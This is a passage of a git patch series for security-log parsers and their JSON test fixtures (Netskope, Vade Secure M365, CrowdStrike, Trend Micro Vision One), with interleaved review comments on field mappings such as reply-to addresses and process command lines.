ance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}", + "sekoiaio": { + "intake": { + "dialect": "Netskope", + 
"dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216" + } + } + }, + "expected": { + "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 
2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template
\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}", + "event": { + "action": "Upload", + "category": [ + "network" + ], + "dataset": "nspolicy", + "duration": 0, + "kind": "event", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-14T09:04:46Z", + "destination": { + "address": "1.2.3.4", + "bytes": 0, + "geo": { + "city_name": "Prague", + "country_iso_code": "CZ", + "location": { + "lat": 50.0883, + "lon": 14.4124 + }, + "postal_code": "110 00", + "region_name": "Prague", + "timezone": "Europe/Prague" + }, + "ip": "1.2.3.4" + }, + "file": { + "hash": { + "md5": "68b329da9893e34099c7d8ad5cb9c940" + }, + "mime_type": "File Type Not Detected", + "name": "object.txt", + "size": 24 + }, + "host": { + "name": "PC-HOST01", + "os": { + "name": "Windows 10", + "platform": "windows", + "type": "windows", + "version": "Windows NT 10.0" + } + }, + "netskope": { + "events": { + "access_method": "Client", + "application": { + "category": "Remote Access", + "name": "App" + }, + "ccl": "medium" + } + }, + "network": { + "bytes": 0 + }, + "observer": { + "vendor": "Netskope" + }, + "related": { + "hash": [ + "68b329da9893e34099c7d8ad5cb9c940" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "JDOE" + ] + }, + "rule": { + "id": "22222222222222222222222222222222 2024-10-30 13:52:18.401518" + }, + "source": { + "address": "5.6.7.8", + "bytes": 0, + "geo": { + "city_name": "Paris", + "country_iso_code": "FR", + "location": { + "lat": 48.6673, + "lon": 2.3476 + }, + "postal_code": "75001", + "region_name": "\u00cele-de-France", + "timezone": "Europe/Paris" + }, + "ip": "5.6.7.8" + }, + "url": { + "original": "url.app.com/object2.txt", + "path": "url.app.com/object2.txt" + }, + 
"user": { + "domain": "mail.com", + "email": "JDOE@mail.com", + "name": "JDOE" + }, + "user_agent": { + "name": "CHROME", + "version": "6.0;" + } + } +} \ No newline at end of file diff --git a/Netskope/netskope_events/tests/test_user_alert.json b/Netskope/netskope_events/tests/test_user_alert.json index a882c2ac5..4c435b860 100644 --- a/Netskope/netskope_events/tests/test_user_alert.json +++ b/Netskope/netskope_events/tests/test_user_alert.json 
@@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"useralert\",\n \"activity\": \"Share\",\n \"alert\": \"yes\",\n \"app\": \"WeTransfer\",\n \"app_session_id\": 1111111111111111111,\n \"appcategory\": \"Cloud Storage\",\n \"browser\": \"Edge\",\n \"browser_session_id\": 2222222222222222222,\n \"browser_version\": \"108.0.1462.54\",\n \"category\": \"Cloud Storage\",\n \"cci\": 58,\n \"ccl\": \"low\",\n \"connection_id\": 3333333333333333333,\n \"count\": 1,\n \"device\": \"Windows Device\",\n \"device_classification\": \"unmanaged\",\n \"dst_country\": \"IE\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 53.3379,\n \"dst_location\": \"Dublin\",\n \"dst_longitude\": -6.2591,\n \"dst_region\": \"Leinster\",\n \"dst_timezone\": \"Europe/Dublin\",\n \"dst_zipcode\": \"D02\",\n \"dstip\": \"108.128.91.183\",\n \"from_user\": \"jane.doe@example.org\",\n \"hostname\": \"TEST-1234\",\n \"managed_app\": \"no\",\n \"managementID\": \"99999999999999999999999999999999\",\n \"netskope_pop\": \"FR-PAR1\",\n \"notify_template\": \"useralert_justify.html\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"Client.exe\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Windows 11\",\n \"os_version\": \"Windows 11\",\n \"page\": \"wetransfer.com/\",\n \"page_site\": \"Web Background\",\n \"policy\": \"DO NOT CHANGE Educate Upload to Non-Corporate Storage\",\n \"policy_id\": \"99999999999999999999999999999999 2022-12-21 14:31:09.981853\",\n \"protocol\": \"HTTPS/2\",\n \"referer\": \"https://wetransfer.com/\",\n \"request_id\": 4444444444444444444,\n \"severity\": \"unknown\",\n \"site\": \"WeTransfer\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 15:52:08 2022\",\n \"src_timezone\": 
\"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"telemetry_app\": \"\",\n \"timestamp\": 1671634321,\n \"to_user\": \"a@a.fr\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 4444444444444444444,\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"wetransfer.com/api/v4/transfers/email\",\n \"user\": \"john.doe@example.org\",\n \"useragent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"internal_collaborator_count\": 0,\n \"fromlogs\": \"\",\n \"dlp_incident_id\": 0,\n \"owner\": \"\",\n \"dlp_profile\": \"\",\n \"workspace\": \"\",\n \"user_id\": \"\",\n \"userPrincipalName\": \"\",\n \"true_obj_category\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"orignal_file_path\": \"\",\n \"other_categories\": [],\n \"serial\": \"\",\n \"tss_mode\": \"\",\n \"conn_duration\": 0,\n \"from_user_category\": \"\",\n \"md5\": \"\",\n \"data_type\": \"\",\n \"title\": \"\",\n \"log_file_name\": \"\",\n \"dstport\": 0,\n \"exposure\": \"\",\n \"instance_id\": \"\",\n \"audit_category\": \"\",\n \"netskope_activity\": \"\",\n \"file_type\": \"\",\n \"total_collaborator_count\": 0,\n \"file_path\": \"\",\n \"modified\": 0,\n \"dlp_rule_count\": 0,\n \"suppression_end_time\": 0,\n \"CononicalName\": \"\",\n \"alert_type\": \"\",\n \"sanctioned_instance\": \"\",\n \"suppression_start_time\": 0,\n \"dlp_parent_id\": 0,\n \"true_obj_type\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"audit_type\": \"\",\n \"workspace_id\": \"\",\n \"dsthost\": \"\",\n \"web_universal_connector\": \"\",\n \"req_cnt\": 0,\n \"mime_type\": \"\",\n \"suppression_key\": \"\",\n \"scan_type\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"object_id\": \"\",\n \"user_category\": \"\",\n \"dlp_rule\": \"\",\n \"parent_id\": \"\",\n \"sha256\": \"\",\n \"dlp_rule_severity\": 
\"\",\n \"logintype\": \"\",\n \"org\": \"\",\n \"dlp_unique_count\": 0,\n \"file_size\": 0,\n \"instance\": \"\",\n \"sAMAccountName\": \"\",\n \"resp_cnt\": 0,\n \"universal_connector\": \"\",\n \"numbytes\": 0,\n \"server_bytes\": 0,\n \"channel_id\": \"\",\n \"file_lang\": \"\",\n \"app_activity\": \"\",\n \"appsuite\": \"\",\n \"sessionid\": \"\",\n \"loginurl\": \"\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"custom_connector\": \"\"\n}\n", "event": { - "action": "Share", + "action": "useralert", "category": [ "network" ], From dc3c4ff33c7a2ecedd7e1f28c5662b24f763efa0 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 11:32:02 +0100 Subject: [PATCH 41/84] Improvement: Vade Secure M365 - Add parsed fields --- VadeSecure/vade_secure_m365/_meta/fields.yml | 5 ++ VadeSecure/vade_secure_m365/ingest/parser.yml | 5 ++ .../vade_secure_m365/tests/email_02.json | 61 +++++++++++++++ .../tests/email_with_attachment_02.json | 77 +++++++++++++++++++ 4 files changed, 148 insertions(+) create mode 100644 VadeSecure/vade_secure_m365/tests/email_02.json create mode 100644 VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index 1e4a81657..a3f60b15c 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml +++ b/VadeSecure/vade_secure_m365/_meta/fields.yml @@ -58,6 +58,11 @@ vadesecure.attachments: short: vadesecure.to_header type: array +vadesecure.auth_results_details: + description: Details of security protocols, mostly SPF, DKIM and DMARC. + name: vadesecure.auth_results_details + type: object + vadesecure.campaign.actions: description: The actions carried out for the remediation campaign. name: vadesecure.campaign.actions diff --git a/VadeSecure/vade_secure_m365/ingest/parser.yml b/VadeSecure/vade_secure_m365/ingest/parser.yml index 539de1df4..cbac9cd2d 100644 --- a/VadeSecure/vade_secure_m365/ingest/parser.yml 
+++ b/VadeSecure/vade_secure_m365/ingest/parser.yml @@ -56,6 +56,7 @@ stages: actions: - name: set set: + vadesecure.auth_results_details: "{{parse_json.message.auth_results_details}}" vadesecure.folder: "{{parse_json.message.folder}}" vadesecure.from_header: "{{parse_json.message.from_header}}" vadesecure.to_header: "{{parse_json.message.to_header}}" @@ -131,3 +132,7 @@ stages: - set: source.ip: "{{parse_json.message.sender_ip}}" filter: "{{parse_json.message.sender_ip| is_ipaddress}}" + + - set: + email.reply_to.address: "{{parse_json.message.reply_to_header}}" + filter: "{{parse_json.message.reply_to_header != ''}}" diff --git a/VadeSecure/vade_secure_m365/tests/email_02.json b/VadeSecure/vade_secure_m365/tests/email_02.json new file mode 100644 index 000000000..7b2c0ae83 --- /dev/null +++ b/VadeSecure/vade_secure_m365/tests/email_02.json 
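Review bot: `email.reply_to.address` is assigned the raw `reply_to_header` value, but a Reply-To header may carry a display name (`Name <addr>`) or several comma-separated addresses, and the neighbouring `from_header`/`to_header` fixture values (`"John DOE "`, `"Alan Smithee "`) show Vade's `*_header` fields are display forms rather than bare addresses. If Vade emits the display form here, the ECS address field ends up holding a non-address and rules that compare it with `email.from.address` (the usual reply-to hijack check) silently miss. Consider extracting the angle-bracketed part first, e.g. a grok on the header with `<%{EMAILADDRESS:address}>` and the raw value as fallback, and tighten the guard to `filter: "{{parse_json.message.reply_to_header | default('') != ''}}"` so a missing key does not pass as a non-empty string if the engine renders undefined values as empty. The stage list this hunk extends continues above the hunk.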
@@ -0,0 +1,61 @@ +{ + "input": { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "sekoiaio": { + "intake": { + "dialect": "Vade for M365", + "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232" + } + } + }, + "expected": { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": 
\"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [], + "from": { + "address": "jd@doe.fr" + }, + "local_id": "cs72a9b6r0glddhdfh7g", + "message_id": "", + "reply_to": { + "address": "user@company.com" + }, + "subject": "Informations", + "to": { + "address": "alan.smithee@doe.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [], + "auth_results_details": { + "dkim": "none", + "dmarc": "fail", + "spf": "temperror" + }, + "from_header": "John Doe", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan.smithee@doe.fr", + "whitelist": "false" + } + } +} \ No newline at end of file diff --git a/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json new file mode 100644 index 000000000..679e24c56 --- /dev/null +++ b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json 
@@ -0,0 +1,77 @@ +{ + "input": { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], \"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "sekoiaio": { + "intake": { + "dialect": "Vade for M365", + "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232" + } + } + }, + "expected": { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], 
\"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [ + { + "file": { + "extension": "jpg", + "hash": { + "md5": "7bc2b146a309acbff2da55e6b4124a82", + "sha1": "299d5bf95adb52e640f9723c5f58b5a8e880be9b", + "sha256": "288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368", + "sha512": "7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423" + }, + "name": "image001.jpg", + "size": 5130 + } + } + ], + "from": { + "address": "john.doe@mail.fr" + }, + "local_id": "csb6q1pgfisg9knp1l5g", + "message_id": "", + "subject": "Re: Your mail", + "to": { + "address": "alan.smithee@company.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [ + { + 
"filename": "image001.jpg", + "id": "12345678901234567890" + } + ], + "auth_results_details": { + "dkim": "fail", + "dmarc": "none", + "spf": "temperror" + }, + "from_header": "John DOE ", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan Smithee ", + "whitelist": "false" + } + } +} \ No newline at end of file From cb5456827e5201fd75229cc4770a445a72738be0 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 11:59:10 +0100 Subject: [PATCH 42/84] CrowdStrike telemetry: fix on parsing error --- CrowdStrike/crowdstrike-telemetry/_meta/fields.yml | 5 ----- CrowdStrike/crowdstrike-telemetry/ingest/parser.yml | 7 ++----- .../crowdstrike-telemetry/tests/telemetry_event_26.json | 5 ++++- 3 files changed, 6 insertions(+), 11 deletions(-) diff --git a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml index 75e1b7434..a59b68006 100644 --- a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml +++ b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml @@ -1,8 +1,3 @@ -crowdstrike.base_filename: - description: Base Filename - name: crowdstrike.base_filename - type: keyword - crowdstrike.customer_id: description: Customer ID (cid) name: crowdstrike.customer_id diff --git a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml index 03e9819e7..5d0069c0a 100644 --- a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml +++ b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml @@ -53,9 +53,6 @@ stages: "host.domain": "{{parsed_event.message.MachineDomain}}" "host.mac": "{{parsed_event.message.MAC}}" - - set: - crowdstrike.base_filename: "{{parsed_event.message.ContextBaseFileName}}" - set_registry_fields: actions: - set: 
@@ -180,9 +177,9 @@ stages: - set: "event.action": "{{parsed_event.message.event_simpleName}}" - "process.command_line": "{{parsed_event.message.CommandLine}}" + "process.command_line": "{{parsed_event.message.CommandLine or parsed_event.message.ContextBaseFileName}}" "process.executable": "{{parsed_event.message.ImageFileName}}" - "process.name": "{{parsed_event.message.ImageFileName | basename}}" + "process.name": "{{parsed_event.message.ImageFileName | basename or parsed_event.message.ContextBaseFileName}}" "process.thread.id": "{{parsed_event.message.SourceThreadId | int}}" "process.parent.name": "{{parsed_event.message.ParentBaseFileName}}" "process.parent.pid": "{{parsed_event.message.ParentProcessId}}" diff --git a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json index 1e7368eee..01e9a933f 100644 --- a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json +++ b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json @@ -18,7 +18,6 @@ "id": "111111111111111" }, "crowdstrike": { - "base_filename": "svchost.exe", "customer_id": "222222222222222222222" }, "file": { @@ -34,6 +33,10 @@ "platform": "win" } }, + "process": { + "command_line": "svchost.exe", + "name": "svchost.exe" + }, "related": { "ip": [ "4.3.2.1" From fa87d4f91aea0f4fe26bdcaa466793c87268fddf Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 20 Nov 2024 10:51:50 +0200 Subject: [PATCH 43/84] Smart descs --- .../trend-micro-vision-one/_meta/smart-descriptions.json | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json index 7a3ee9d51..742eee7cc 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json +++ b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json 
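Review bot: Falling back to `ContextBaseFileName` for `process.command_line` puts a bare file name (`svchost.exe` in the updated fixture) into a field that detection content treats as the full command line, so rules keyed on argument patterns, or on `process.command_line` differing from `process.name`, now see a fabricated value they cannot tell apart from a real one. The fallback is appropriate for `process.name`, which is a base name by definition; keep `"process.command_line": "{{parsed_event.message.CommandLine}}"` unset when CrowdStrike does not supply it, and if the context file name must be preserved for these event types, reinstate `crowdstrike.base_filename` (removed earlier in this same commit) instead of overloading an ECS field. In `ImageFileName | basename or ContextBaseFileName` the filter binds before `or`, i.e. `(ImageFileName | basename) or …`, which is presumably intended — a short comment would help, since `basename` on a missing field may raise depending on how the engine handles undefined values.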
@@ -1,4 +1,8 @@ [ + { + "value": "{event.reason} on {host.ip}", + "conditions": [{ "field": "event.reason" }, { "field": "host.ip" }] + }, { "value": "{event.reason}", "conditions": [{ "field": "event.reason" }] From 7b8703b20c6bbccf5d801d9dda0f06c9b05431ce Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 20 Nov 2024 12:24:27 +0200 Subject: [PATCH 44/84] Fixes and improvements --- .../trend-micro-vision-one/ingest/parser.yml | 22 +++++++++++-------- .../tests/test_registry.json | 3 ++- 2 files changed, 15 insertions(+), 10 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index be400399d..a13ee54b2 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml 
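Review bot: `{host.ip}` is interpolated directly, but for this intake `host.ip` is an array (the fixture added later in this series expects `"ip": ["1.2.3.4"]`), so unless the description engine flattens lists the rendered text may show a list literal rather than an address. If lists are rendered verbatim, prefer `{event.reason} on {host.name}` — a scalar the same fixture populates — or confirm list rendering before relying on this template.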
@@ -39,14 +39,19 @@ stages: event.url: "{{parsed_event.message.model.workbenchLink}}" + - set: process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" + process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" + process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" + process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" + process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" + process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" + - set: registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[0] }}" registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" - registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}" - registry.path: > {%- set path = [] -%} {%- for indicator in parsed_event.message.indicators -%} 
